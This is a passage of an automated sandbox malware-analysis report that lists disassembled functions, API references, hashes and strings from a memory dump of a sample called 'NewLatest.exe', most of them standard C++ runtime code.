Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: f7e1186c1b5c7d3a13ca559c48d293005633e318ac8bf58c3e9a13e567310803
Instruction ID: 0f7bfb4553082e9f64e60ddc6624382adda9490d19410fbbe131bde4ede2d8bb
Opcode Fuzzy Hash: f7e1186c1b5c7d3a13ca559c48d293005633e318ac8bf58c3e9a13e567310803
Instruction Fuzzy Hash: DF318F71E401258FEB1DDFA8C9415AEBBB6AF09310F24446EE415E7380DB769E02CBA5

Function 0060ED6F Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0060EDCC
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0060EDD8
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0060EDF1
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0060EE1F
Concurrency::Context::Block.LIBCONCRT ref: 0060EE41

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: 85fc936d0191784f06c16a5d12bf51c92a4cc1a3153858d0a702f6703c9b877e
Instruction ID: 8d140624f0b82d66b818e28a017fb86a2edf51dfe3ac3062450a125c4a745b7c
Opcode Fuzzy Hash: 85fc936d0191784f06c16a5d12bf51c92a4cc1a3153858d0a702f6703c9b877e
Instruction Fuzzy Hash: 1E214671D80229CADF6CDFA4C4456EFB7B2BF15310F14091EE151A62D1E7B24A84CB55

Function 00619F36 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00619F79

Part of subcall function 0061B470: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0061B4BF

GetCurrentThread.KERNEL32 ref: 00619F83
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00619F8F

Part of subcall function 00610298: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 006102AA

Part of subcall function 00610724: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0061072B

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00619FD2

Part of subcall function 0061B422: SetEvent.KERNEL32(?,?,00619FD7,0061AD6B,00000000,?,00000000,0061AD6B,00000004,0061B417,?,00000000,?,?,00000000), ref: 0061B466

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00619FDB

Part of subcall function 0061AA51: List.LIBCONCRT ref: 0061AA87

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00619FEB

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 318399070-0
Opcode ID: 1ccdce51a76d29d084736fdebc09c9378199fa18d07bd91aabf042f4189d103a
Instruction ID: 319106c98b72cfb9c6cb59b92e43f8ef81d8641fcd6b950ddbdea37a48c263a6
Opcode Fuzzy Hash: 1ccdce51a76d29d084736fdebc09c9378199fa18d07bd91aabf042f4189d103a
Instruction Fuzzy Hash: C421AC31500714AFCB64EF65D9908EBB3F6FF48300704461DE442976A1CB70F985CBA5

Function 00624E47 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00624E3E,006239FF,0060B455,52CC3793,?,00000000,0063B248,000000FF,?,005F232A,?,?), ref: 00624E55
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00624E63
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00624E7C
SetLastError.KERNEL32(00000000,?,00624E3E,006239FF,0060B455,52CC3793,?,00000000,0063B248,000000FF,?,005F232A,?,?), ref: 00624ECE

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e0294a78814d88b1a90e95b60b167b1fd80f7bea5e5a04c2cd48fa9c9b2fbae0
Instruction ID: dc7817f520ad818e7aaf4d46a2edc9b94624f93352d8fe54be8ec4b83b44fdbe
Opcode Fuzzy Hash: e0294a78814d88b1a90e95b60b167b1fd80f7bea5e5a04c2cd48fa9c9b2fbae0
Instruction Fuzzy Hash: 2301FC3210AF325EB7742775FC85E972A47FB02775B21032EF524421E1EF524C51AE44

Function 0060FB2B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0060FB39
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0060FB3F
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0060FB6C
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0060FB76
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,?,00000000,?,?), ref: 0060FB88
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0060FB9E

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID:
API String ID: 2808382621-0
Opcode ID: ce992230019c3f81e28865d5862a1570ae6bd896b6124e73d37fddee2fbd9ff5
Instruction ID: baf449c0fbcfcf6690caecfb1dc7e50eba8cc536e02e710e7f14af049549cf0d
Opcode Fuzzy Hash: ce992230019c3f81e28865d5862a1570ae6bd896b6124e73d37fddee2fbd9ff5
Instruction Fuzzy Hash: D101D435680125ABEB24BBA5EC59EFF376FEF81760B140439F501E2991EB34D9018B64

Function 00632592 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00646748), ref: 006325FC
_free.LIBCMT ref: 006325EA

Part of subcall function 0062AC95: HeapFree.KERNEL32(00000000,00000000,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?), ref: 0062ACAB
Part of subcall function 0062AC95: GetLastError.KERNEL32(?,?,0062EF6D,?,00000000,?,?,?,0062EF94,?,00000007,?,?,0062F396,?,?), ref: 0062ACBD

_free.LIBCMT ref: 006327B6

Strings

Hgd, xrefs: 006325A5, 006325AB
Hgd, xrefs: 00632719

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Hgd$Hgd
API String ID: 2155170405-2725361215
Opcode ID: e6407babf95b8e3a41be29a4b15674fb08a760019bb66f9188928861f969b796
Instruction ID: c7a6012e5f19f3e858ec9485705be9be70c6c58ff2f962781e6dae5b91d3803c
Opcode Fuzzy Hash: e6407babf95b8e3a41be29a4b15674fb08a760019bb66f9188928861f969b796
Instruction Fuzzy Hash: 0151F77190031AABCB10EF64DC929AA77BFEF46310F10466DF421972A1EB709E41CBD4

Function 005FDAC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

list too long, xrefs: 005FDF7D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: mtx_do_lock
String ID: list too long
API String ID: 1389037287-1124181908
Opcode ID: 2089fabfda57825370ac4709fb7a1cd34c863d1d872f78e81a6a69af40096dc3
Instruction ID: a2db73f935ae57990cc746f624a4fec7f2963f700ae40a51034f3d6248691ace
Opcode Fuzzy Hash: 2089fabfda57825370ac4709fb7a1cd34c863d1d872f78e81a6a69af40096dc3
Instruction Fuzzy Hash: 1E51C370D44718ABDB54EF64CC45BAAF7B9EF04710F0042A9F908A7281EB74AA81CF65

Function 00621737 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00621792
std::invalid_argument::invalid_argument.LIBCONCRT ref: 006217B1
Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006217F8

Strings

pContext, xrefs: 006217A9

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$ExecutionFreeIdleProcessorProxy::Root::SpinSuspendThreadUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1284976207-2046700901
Opcode ID: d05bfe48d7e90ce43511a2b024925eda879d2742b16ecc8ad6b12c72c5fc43fa
Instruction ID: 610ce0eb34a4201836a24b8cbbdd4f8d0e08d9128c7eae1546abfaaf5970f1dc
Opcode Fuzzy Hash: d05bfe48d7e90ce43511a2b024925eda879d2742b16ecc8ad6b12c72c5fc43fa
Instruction Fuzzy Hash: CE212C35704A359BCB15AB28E894ABE73A7BFE2324B04001AE9118B3D1CB74EC418F81

Function 0062DE83 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe, xrefs: 0062DE88

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe
API String ID: 0-2190204624
Opcode ID: a867b9e62f178ba86a879103c451a73f9d0867809162a22e4bc978d76c1f02c4
Instruction ID: cb086e3d2dcc86758a997a8d4db3ef2e5f312a8da9af63f48cc813ddd2a547b6
Opcode Fuzzy Hash: a867b9e62f178ba86a879103c451a73f9d0867809162a22e4bc978d76c1f02c4
Instruction Fuzzy Hash: 1221F671604939AF9B60AF61BD81DAB77AFEF403647104518F925C7290E731DC508FA4

Function 006270A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 006270EB

Strings

.com, xrefs: 0062712B
.exe, xrefs: 006270F8
.cmd, xrefs: 00627109
.bat, xrefs: 0062711A

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: c444f44ffb0f136b1f3de924e39c98268c39022555be052e66f709e35b9ff9e3
Instruction ID: dd3fea935d0fdbb92e240a1f20fe49e2b8577e06ff24524ccf62bcd66dbe3b07
Opcode Fuzzy Hash: c444f44ffb0f136b1f3de924e39c98268c39022555be052e66f709e35b9ff9e3
Instruction Fuzzy Hash: C501A537A08B362566146019BC02AB6579B8F97BB4B2E002EF944E73C2EE54DC5245A4

Function 00614DB2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 00614E11
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00614E34
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00614E76

Strings

ppVirtualProcessorRoots, xrefs: 00614E2C
count, xrefs: 00614DCA

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CacheConcurrency::details::GroupLocalSchedule$Node::ProcessorSchedulingSegmentSegment::Virtualstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 18808576-3650809737
Opcode ID: 528252a94084d80bd090b29034ff7ea43361562aaa1a6cfd027df8ed2849c349
Instruction ID: ca49bcc046f043d54296c91c7d00ad10ea4cbb721c2b02c72a47eb9665b0dcf3
Opcode Fuzzy Hash: 528252a94084d80bd090b29034ff7ea43361562aaa1a6cfd027df8ed2849c349
Instruction Fuzzy Hash: 50218C35A00215AFCB48EFA8C892EAE77B6BF48300F14406DE5069B691DF71EA41CB95

Function 00625EC7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 00625F17

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: a7a4083aceb749d3897cf57fa11061f0960c3d15adb20fe01fb3a8f4ec30b584
Instruction ID: cebb5dcaf34c8e7c3d0b7aa891c626d3687c9940198fd8ffcd628b616f0d72b7
Opcode Fuzzy Hash: a7a4083aceb749d3897cf57fa11061f0960c3d15adb20fe01fb3a8f4ec30b584
Instruction Fuzzy Hash: D311B675A01E36ABDB318B68AD44A9A775B9F01770B254111FD17AB390D770DD018EE0

Function 00621FA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

StructuredWorkStealingQueue.LIBCMT ref: 00621FC4
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00621FD5
StructuredWorkStealingQueue.LIBCMT ref: 0062200B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0062201C

Strings

e, xrefs: 00621FE6

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured
String ID: e
API String ID: 3804418703-4024072794
Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction ID: 470d003529ecbd68b4d7b6cfde57639072d9bece36f4a529c989a31946544891
Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
Instruction Fuzzy Hash: ED11E731104925ABDB55DE28E951AAB33A7AF223A4B18C05AEC11CF242DB71DD01DFA0

Function 0062647D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00626472,?,?,0062643A,?,?,?), ref: 00626492
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006264A5
FreeLibrary.KERNEL32(00000000,?,?,00626472,?,?,0062643A,?,?,?), ref: 006264C8

Strings

mscoree.dll, xrefs: 0062648B
CorExitProcess, xrefs: 0062649D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b5230173484300dec88a5049da9bed86ce11aad982cbdead1f8725190c9315b5
Instruction ID: ddc858c7793da2643b49637fea8313c0297b2b8f50bdeedc852729c0de415a37
Opcode Fuzzy Hash: b5230173484300dec88a5049da9bed86ce11aad982cbdead1f8725190c9315b5
Instruction Fuzzy Hash: AEF01235941629FBDB119B90ED0DBDE7AB7EB41755F144050F905A22A0CB748E00DB90

Function 00636649 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(01261198,01261198,?,7FFFFFFF,?,?,00636905,01261198,01261198,?,01261198,?,?,?,?,01261198), ref: 006366EC
__alloca_probe_16.LIBCMT ref: 006367A2
__alloca_probe_16.LIBCMT ref: 00636838
__freea.LIBCMT ref: 006368A3
__freea.LIBCMT ref: 006368AF

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 0c2508813ed1c3c4e938c84a049ec224ac6e94dc48fedc0524c771fdbbba5bb5
Instruction ID: 20bcc1b268623a3b1bfb3ed83041d93905aedca700250d17c8a08e301701959e
Opcode Fuzzy Hash: 0c2508813ed1c3c4e938c84a049ec224ac6e94dc48fedc0524c771fdbbba5bb5
Instruction Fuzzy Hash: E281B072D00219BBDF209FA4C881AEEBBB7AF49354F188159F901A7381D671CC418BF5

Function 00634AB4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00634B38
__alloca_probe_16.LIBCMT ref: 00634BFE
__freea.LIBCMT ref: 00634C6A

Part of subcall function 0062AEEB: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0062AF1D

__freea.LIBCMT ref: 00634C73
__freea.LIBCMT ref: 00634C96

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: e2ad08ab0d6938cdd6702aac256774aa8773c5e7429458b128f84455d88e4284
Instruction ID: 03c999d17559b1024500f05165aa33675eaf5011e9dc4b4bfd295304e38eefe1
Opcode Fuzzy Hash: e2ad08ab0d6938cdd6702aac256774aa8773c5e7429458b128f84455d88e4284
Instruction Fuzzy Hash: 9351D172601216AFEF209F64DC81EFBBAABDB84750F154128FD0497240EB75EC518BE4

Function 005FDDBE Relevance: 7.6, APIs: 5, Instructions: 142networkCOMMON

Download Yara Rule

